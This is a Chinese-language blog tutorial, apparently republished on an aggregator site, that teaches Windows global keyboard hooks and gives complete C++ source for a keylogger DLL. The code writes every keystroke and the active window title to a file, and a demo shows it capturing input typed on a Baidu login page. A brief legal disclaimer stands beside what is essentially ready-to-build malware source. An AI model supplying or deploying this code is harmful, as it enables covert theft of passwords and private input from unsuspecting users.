有一種技術(shù)被稱為HOOK，人們習(xí)慣上叫做鉤子。鉤子技術(shù)的應(yīng)用范圍比較廣：輸入監(jiān)控，API攔截，消息捕獲等等。

今天我們來做的是鍵盤記錄器

編譯工具:visual studio 2019
編程語言:自然是C++，Python做的我會寫個(gè)標(biāo)題“C++”嗎？
編程技術(shù):HOOK

另外我說一下:

中華人民共和國《網(wǎng)絡(luò)安全法》規(guī)定了：任何竊取他人信息都是違法的！本文僅供技術(shù)參考，若有人使用本文技術(shù)非法竊取他人信息，作者不承擔(dān)任何法律責(zé)任！

HOOK技術(shù)分為好幾種，我今天介紹一種:Windows鉤子
Windows鉤子又分為全局鉤子和局部鉤子.局部鉤子是針對一個(gè)線程的，而全局鉤子就針對整個(gè)操作系統(tǒng).所以需要DLL文件來支持.

打開visual studio 2019，創(chuàng)建新項(xiàng)目->動態(tài)鏈接庫(DLL),如圖:

這個(gè)是我們要用到的函數(shù)SetWindowsHookEx()，定義如下

HHOOK SetWindowsHookEx(
In int idHook,
In HOOKPROC lpfn,
In_opt HINSTANCE hmod,
In DWORD dwThreadId);

來說說SetWindowsHookEx()的參數(shù)：
idHook：鉤子的類型，我們要用的就是WH_KEYBOARD
lpfn：制定鉤子函數(shù)地址，我們需要寫一個(gè)函數(shù)
hmod：模塊句柄
dwThreadId：表示需要被HOOK的線程ID號，如果為0的話就所有的線程都HOOK

UnhookWindowsHookEx()卸載鉤子，定義如下

BOOL UnhookWindowsHookEx( In HHOOK hhk);

hhk:鉤子句柄

開始實(shí)戰(zhàn)！！！

首先導(dǎo)出兩個(gè)函數(shù)

extern "C" _declspec(dllexport) BOOL SetHookOn(); extern "C" _declspec(dllexport) BOOL SetHookOff();

初始化，注意DllMain()不是DLLMain(),很多大佬都犯

HHOOK g_keyHook = NULL; HINSTANCE g_Inst = NULL; LRESULT CALLBACK KeyboardProc(int code,WPARAM wParam,LPARAM lParam); BOOL APIENTRY DllMain( HMODULE hModule,DWORD ul_reason_for_call,LPVOID lpReserved) {g_Inst = (HINSTANCE)hModule;return TRUE; }

開啟鉤子函數(shù)

BOOL SetHookOn() {g_keyHook = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, GetModuleHandle(L"鍵盤HOOK"), 0);if (g_keyHook){return TRUE;}return FALSE; }

卸載鉤子函數(shù)

BOOL SetHookOff() {return UnhookWindowsHookEx(g_keyHook); }

鍵盤鉤子函數(shù)，前面是獲取窗口的標(biāo)題

LRESULT CALLBACK KeyboardProc(int code,WPARAM wParam,LPARAM lParam) {HWND hWnd = GetForegroundWindow();DWORD dwProcess;LRESULT result = 0;DWORD dwPID = GetWindowThreadProcessId(hWnd, &dwProcess);HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwProcess);WCHAR wszProcessPath[MAX_PATH] = { 0 };DWORD dwSize = MAX_PATH;QueryFullProcessImageNameW(hProcess, 0, wszProcessPath, &dwSize);CHAR wszTitle[MAX_PATH] = { 0 };result = GetWindowTextA(hWnd, wszTitle, MAX_PATH);FILE* fp = fopen("文件路徑", "a");if (fp == NULL)return CallNextHookEx(g_keyHook, code, wParam, lParam);if (lParam & 0x40000000){return CallNextHookEx(g_keyHook, code, wParam, lParam);}if (code == HC_NOREMOVE || code < 0){return CallNextHookEx(g_keyHook, code, wParam, lParam);}char szkeyName[100] = { 0 };GetKeyNameTextA(lParam, szkeyName, 100);fwrite(wszTitle, 1, strlen(wszTitle), fp);fwrite("\t", 1, 2, fp);fwrite(szkeyName, 1, strlen(szkeyName), fp);fwrite("\r\n", 1, 2, fp);fclose(fp);return CallNextHookEx(g_keyHook, code, wParam, lParam); }

我在fopen()的第一個(gè)參數(shù)下沒有寫文件路徑，你們自己創(chuàng)建一個(gè)txt文件，寫上路徑

完整代碼

#include "pch.h" #include <stdio.h>#pragma warning(disable:4996)extern "C" _declspec(dllexport) BOOL SetHookOn(); extern "C" _declspec(dllexport) BOOL SetHookOff();HHOOK g_keyHook = NULL; HINSTANCE g_Inst = NULL; LRESULT CALLBACK KeyboardProc(int code,WPARAM wParam,LPARAM lParam); BOOL APIENTRY DllMain( HMODULE hModule,DWORD ul_reason_for_call,LPVOID lpReserved) {g_Inst = (HINSTANCE)hModule;return TRUE; }BOOL SetHookOn() {g_keyHook = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, GetModuleHandle(L"鍵盤HOOK"), 0);if (g_keyHook){return TRUE;}return FALSE; } BOOL SetHookOff() {return UnhookWindowsHookEx(g_keyHook);} LRESULT CALLBACK KeyboardProc(int code,WPARAM wParam,LPARAM lParam) {HWND hWnd = GetForegroundWindow();DWORD dwProcess;LRESULT result = 0;DWORD dwPID = GetWindowThreadProcessId(hWnd, &dwProcess);HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwProcess);WCHAR wszProcessPath[MAX_PATH] = { 0 };DWORD dwSize = MAX_PATH;QueryFullProcessImageNameW(hProcess, 0, wszProcessPath, &dwSize);CHAR wszTitle[MAX_PATH] = { 0 };result = GetWindowTextA(hWnd, wszTitle, MAX_PATH);FILE* fp = fopen("", "a");if (fp == NULL)return CallNextHookEx(g_keyHook, code, wParam, lParam);if (lParam & 0x40000000){return CallNextHookEx(g_keyHook, code, wParam, lParam);}if (code == HC_NOREMOVE || code < 0){return CallNextHookEx(g_keyHook, code, wParam, lParam);}char szkeyName[100] = { 0 };GetKeyNameTextA(lParam, szkeyName, 100);fwrite(wszTitle, 1, strlen(wszTitle), fp);fwrite("\t", 1, 2, fp);fwrite(szkeyName, 1, strlen(szkeyName), fp);fwrite("\r\n", 1, 2, fp);fclose(fp);return CallNextHookEx(g_keyHook, code, wParam, lParam); }

生成一個(gè)lib和dll文件
創(chuàng)建一個(gè)MFC項(xiàng)目，弄兩個(gè)按鈕，…

項(xiàng)目展示：

我在百度登錄網(wǎng)站上輸入賬號：12345，然后按了一下大寫（Caps）,然后輸入ABCD

總結(jié)

以上是生活随笔為你收集整理的C++黑客编程:键盘记录器,HOOK技术实现的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。